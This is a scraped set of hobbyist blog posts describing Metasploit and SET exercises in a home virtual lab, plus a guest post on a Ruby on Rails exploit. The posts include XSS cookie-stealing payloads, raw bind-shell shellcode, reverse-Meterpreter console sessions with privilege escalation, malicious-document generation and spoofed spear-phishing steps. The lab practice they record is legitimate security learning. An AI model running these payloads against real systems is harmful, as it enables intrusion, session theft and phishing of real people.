Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

And in the terminal:

meterpreter > irb
[*] Starting IRB shell
[*] The ‘client’ variable holds the meterpreter client

>> client.railgun.user32.MessageBoxA(0,”hello”,”world”,”MB_OK”)

I took a screenshot from Meterpreter:

railgun

And you can see the pop-up box on the exploited machine. The above book describes the power and implication of Railgun as huge, but them covers no further details and suggests reading the Framework tutorial. I think this is something I will have to return to once I’ve learned the basics of Metasploit.

In the meantime, this video was informative:

OWASP WebGoat: Stored XSS Attacks

0
0

Here’s OWASP’s lesson principle:

Lesson Plan Title: How to Perform Stored Cross Site Scripting (XSS)

Concept / Topic To Teach:

It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user’s message is retrieved.

General Goal(s):

The user should be able to add message content that cause another user to load an undesirable page or content.

Quite straight forward lesson. Input anything you like in the “Title” box and then <script language=”javascript” type=”text/javascript”>alert(“Ha Ha Ha”);</script> in the message section and submit.

Check underneath the “Message List” for your Title, click and a popup box appears with “Ha Ha Ha”

Again input anything in the ”Title” box and then <script language=”javascript” type=”text/javascript”>alert(document.cookie);</script> and your popup SessionId will appear.

Here’s a video showing you the process:


Metasploit: Experimenting with Immunity Debugger, NOP’s, Opcode, Assembly Instructions and Shellcode

0
0

I’m following instruction given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

It’s worth watching this excellent video which demonstrates the process I describe below:

First I download Immunity Debugger onto the Windows portion of my Virtual Hacking Lab.

Next to create the shellcode in Metasploit – I used port 446 as I initially struggled with port 443:

~# msfpayload windows/shell/bind_tcp LPORT=446 C
/*
* windows/shell/bind_tcp – 298 bytes (stage 1)
* http://www.metasploit.com
* VERBOSE=false, LPORT=446, RHOST=, EnableStageEncoding=false,
* PrependMigrate=false, EXITFUNC=process,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
“\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30″
“\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff”
“\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2″
“\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85″
“\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3″
“\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d”
“\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58″
“\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b”
“\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff”
“\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68″
“\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01″
“\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50″
“\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31″
“\xdb\x53\x68\x02\x00\x01\xbe\x89\xe6\x6a\x10\x56\x57\x68\xc2″
“\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53″
“\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d”
“\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff”
“\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58″
“\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9″
“\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3″;

/*
* windows/shell/bind_tcp – 240 bytes (stage 2)
* http://www.metasploit.com
*/
unsigned char buf[] =
“\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30″
“\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff”
“\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2″
“\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85″
“\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3″
“\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d”
“\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58″
“\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b”
“\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff”
“\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89″
“\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44″
“\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56″
“\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5″
“\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb”
“\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a”
“\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5″;

I’m only interested in the “Stage 1″ code to which I add a few \x90 at the beginning, which in Intel x86 Assembly Language is a no-operation instructionNOP . I then remove all ” /x occurrences and am left with:

909090909090909090909090909090
909090909090909090909090909090
909090909090909090909090909090
fce8890000006089e531d2648b5230
8b520c8b52148b72280fb74a2631ff
31c0ac3c617c022c20c1cf0d01c7e2
f052578b52108b423c01d08b407885
c0744a01d0508b48188b582001d3e3
3c498b348b01d631ff31c0acc1cf0d
01c738e075f4037df83b7d2475e258
8b582401d3668b0c4b8b581c01d38b
048b01d0894424245b5b61595a51ff
e0585f5a8b12eb865d683332000068
7773325f54684c772607ffd5b89001
000029c454506829806b00ffd55050
50504050405068ea0fdfe0ffd59731
db5368020001be89e66a10565768c2
db3767ffd5535768b7e938ffffd553
53576874ec3be1ffd5579768756e4d
61ffd56a006a0456576802d9c85fff
d58b366a406800100000566a006858
a453e5ffd593536a005653576802d9
c85fffd501c329c685f675ecc3

I then open Immunity Debugger (ID) on the target machine and open iexplore.exe.

In the main ID screen I paste in the above code and create breaks at the start and end of my code.

I then ran the exploit in Metasploit on the attacking machine to see if I could bind with port 446:

msf > use multi/handler
msf exploit(handler) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(handler) > set LPORT 446
LPORT => 446
msf exploit(handler) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler…
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.79
[*] Command shell session 1 opened (192.168.1.70:39979 -> 192.168.1.79:446) at 2013-07-10 10:14:46 +0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Internet Explorer>

And as you can see the connection was duly established.

Metasploit Meterpreter: Internet Explorer “Aurora” Memory Corruption Client-Side Exploit

0
0

I’m following instruction given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Metasploit describe this exploit thus:

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the “Operation Aurora” attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

This is my first client-side exploit and I must say I rather enjoyed it.

Firstly to Metasploit to set up the exploit:

msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.70 <– This is my IP (The attacking machine)
LHOST => 192.168.1.70
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:443
[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.1.70:80/
[*] Server started.

Then I opened Internet Explorer on the target Windows system and entered the IP of the attacking machine in the browser.

At the same time I opened the Task Manager and watched the memory usage for iexplore.exe jump from 3-5,000K to over 300,000K as the exploit filled the heap.

Back to the attacking machine and Metasploit:

msf exploit(ms10_002_aurora) > [*] 192.168.1.79 ms10_002_aurora – Sending Internet Explorer “Aurora” Memory Corruption
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1115) at 2013-07-19 14:53:29 +0100

msf exploit(ms10_002_aurora) >

I then wanted a Meterpreter shell:

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1…

meterpreter >

I took a screenshot of the victim machine:

meterpreter > screenshot

aurora

I then wanted to escalate my privileges:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

I thought I’d best migrate the process in case Explorer was shut down:

meterpreter > run post/windows/manage/migrate

[*] Running module against LAB
[*] Current server process: IEXPLORE.EXE (3156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2720
[+] Successfully migrated to process 2720
meterpreter >

Job done and good fun.

Metasploit Meterpreter: MS11-006 Client-Side Malicious Document Exploit – Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow

0
0

I’m following instruction given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Metasploit describe this exploit thus:

This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The first step is to create the malicious document within Metasploit:

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set outputpath /root/ <– I changed the output directory as the original one didn’t exist.
outputpath => /root/
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.70 <– Attacking machine.
LHOST => 192.168.1.70
msf exploit(ms11_006_createsizeddibsection) > set LPORT 447 <– Attacking machine port.
LPORT => 447
msf exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating ‘msf.doc’ file …
[*] Generated output file /root/msf.doc <– File created.

I then emailed as an attachment the created “malicious” file to open on the target Windows machine. I was very impressed with Google Gmail as it rejected the email and noted:

Our system detected an illegal attachment on your message

So, I had to send the file via another web based mail system.

Before opening the file on the target Windows system, I needed to set up the attacking machine to listen for incoming connections from the target machine:

msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(handler) > set LPORT 447
LPORT => 447
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.70:447
[*] Starting the payload handler…

I then opened the malicious file on the target machine and viewed as a thumbnail in the hope it would trigger the exploit; however, nothing happened, and the hack failed.

Microsoft list the Windows versions affected by this exploit and my x32 XP Pro SP2 is not listed, so perhaps this is the reason the exploit failed. The above book states the Windows system should be SP3, which mine is not.

A little disappointed.

Anyway, here’s a nice step-by-step guide to this exploit.

And this video, may or may not be useful:

The Social-Engineer Toolkit (SET) and Metasploit: Spear-Phishing Attack Vectors

0
0

This post follows instructions given in chapter ten (The Social-Engineer Toolkit) of Metasploit: The Penetration Tester’s Guide, Previous post here.

Here’s what we’re greeted with in the terminal on starting The Social-Engineer Toolkit (SET):

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

We’ll select one and are shown the below:

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

And select one again.

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure “Sendmail” is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

We’ll select one again:

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player “Button” Remote Code Execution
6) Adobe CoolType SING Table “uniqueName” Overflow
7) Adobe Flash Player “newfunction” Invalid Pointer Use
8) Adobe Collab.collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Apple QuickTime PICT PnSize Buffer Overflow
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
19) Adobe Reader u3D Memory Corruption Vulnerability
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

We’ll select eight which is a heap-based exploit.

1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

And now number two:

set:payloads>2
set> IP address for the payload listener: 192.168.1.70 <– Enter attacking IP address
set:payloads> Port to connect back on [443]: <– Enter attacking listening port
[-] Defaulting to port 443…
[-] Generating fileformat exploit…
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of ‘template.whatever’

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don’t care.
2. Rename the file, I want to be cool.

We’ll keep the default filename by entering one.

Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer

99. Return to main menu.

We’ll select one:

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

And select one again:

Available templates:
1: Baby Pics
2: Order Confirmation
3: Status Report
4: How long has it been?
5: Dan Brown’s Angels & Demons
6: New Update
7: Computer Issue
8: Strange internet usage from your computer
9: WOAAAA!!!!!!!!!! This is crazy…
10: Have you seen this?

We’ll go for option three:

Send email to: Enter target email address

I’m going to send this to one of my web based email accounts:

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

I originally selected option one, but Gmail (and all my other web based emails) kept refusing the connection as the email had a potentially dangerous attachment and so was forced to use option two and use my server based email address.

set:phishing>2
set:phishing> From address (ex: moo@example.com):My email address
set:phishing> The FROM NAME user will see: :Make up a name
set:phishing> Username for open-relay [blank]:My server based email address
Password for open-relay [blank]: Password for server email
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com): Email server address
set:phishing> Port number for the SMTP server [25]: Outgoing server email port number
set:phishing> Flag this message/s as high priority? [yes|no]:y
[*] SET has finished delivering the emails

At this point I checked my “target” email account and an email had duly arrived entitled “Status Report” and a PDF attachment, simply entitled “Template”.

Interestingly, I tried to reply to the “sender” but the email address was not available, which is rather handy for stealth.

I opened the pdf attachment out of curiosity and it appeared blank, but it must somehow set off the buffer overflow and and in the process connect to the attacking machine.

Meanwhile, in the terminal I was asked:

set:phishing> Setup a listener [yes|no]:y

Which consequently activated Metasploit:

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.1.70
LHOST => 192.168.1.70
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.70:443
[*] Starting the payload handler…

It would have been rather satisfying to see this exploit complete, but that’s as far as I can go for the moment.

Ruby on Rails Vulnerability: The Exploit and the Importance of Patching

0
0

Guest post:

If you’re running Ruby on Rails CVE-2013-0156 but haven’t patched your server yet, what are you waiting for?

Nothing good lasts forever, and as it must to all good things, an attack has come to the framework of Ruby on Rails, one of the Internet’s more popular open-source Web development applications. The exploit first surfaced in January of 2013, and those who have not yet applied the available patches could be in for trouble.

By the time the first warnings appeared, developers had already introduced the earliest fixes, but a large number of users paid no attention. Many who failed to heed the call soon had reason to regret their inattention to this vital detail.

The Exploit’s Insidious Methods

An inherent vulnerability allows the Rails hacker to infiltrate crontab with a command that remotely downloads, compiles and executes a C source file that has the ability to carry out commands. As a safeguard against compilation failure, it also downloads a pre-compiled version of the same file. The malware then sets up an IRC bot that generates a nine-character, randomly determined nickname and uses it to connect to an IRC server. From this location, it enters the #rails channel and sits awaiting further instruction.

Once connected, the bot will follow the hacker’s every command. It will download and execute malicious files. At its worst, it may even switch the user’s server.

The Roots of the RoR Problem

Ruby on Rails makes extensive use of the JSON processor’s YAML deserialization format for reading the server’s configuration files. Its vulnerability to an arbitrary instantiation of a Ruby object allows the Rails hacker to bypass authentication and connect directly to the server. In addition, RoR’s automatic parameter-parsing capabilities permit the casting of data string values to other data types. Inherent in versions 3.0 and earlier, this flaw opens the door to any attacker intent on harming a Ruby on Rails application.

Once in, the hacker can execute poisonous code or even instigate an actual denial of service. He can also inject sinister SQL queries to extract sensitive information from a website’s database. By permitting the remote execution of system commands, the exploit allows any misguided individual to compromise the integrity of numerous websites with little difficulty.

The Risks for Users Who Fail to Patch

Although the readily available patches present an easy solution to the problem, many have failed to make use of them. This is due in part to RoR’s excellent record of accomplishment for security. Most of its users are not professional developers and may be unaware of the need to keep abreast of recommended updates. Many become so comfortable with the version they are currently using that they resist making changes of any kind. Others fear that the installation of such updates might actually upset an otherwise well-balanced apple cart.

When it comes to ignoring security patches, however, this very complacency can leave a website wide open to a serious malware infestation. The end result: a rampant exploitation that wreaks malevolent havoc on numerous developers and web hosts.

What the User Can Do

To protect against such malicious attacks, it is vital for any Ruby on Rails developer to remain aware of and apply all updates and patches as soon as they appear. Experts also advise checking to ensure that systems can be rebuilt without the need of access to such things as Github and Rubygems. The up-to-date user should be sure to:

- Take proactive steps to maximize security.
- Minimize the use of tech stacks, keeping abreast of security updates for each.
- Maintain an updated list of all applications.
- Take all recommended security measures.

Fortunately, where Ruby on Rails is concerned, the white hats appear to outnumber the black hats, and the good guys are constantly at work in securing and strengthening the application while taking pains to keep users informed of new developments and patches. All that must happen now is for users to pay attention to what they’re saying and, most importantly, to take their advice.

 

About the Author
This article was written by James Younger, a security Subject Matter Expert from Advanced Security by TrainACE. Advanced Security is a training company that provides classes in cutting edge areas of Cyber Security including Exploit Development, Python for Security and Ruby on Rails.

Viewing all 51 articles
Browse latest View live




Latest Images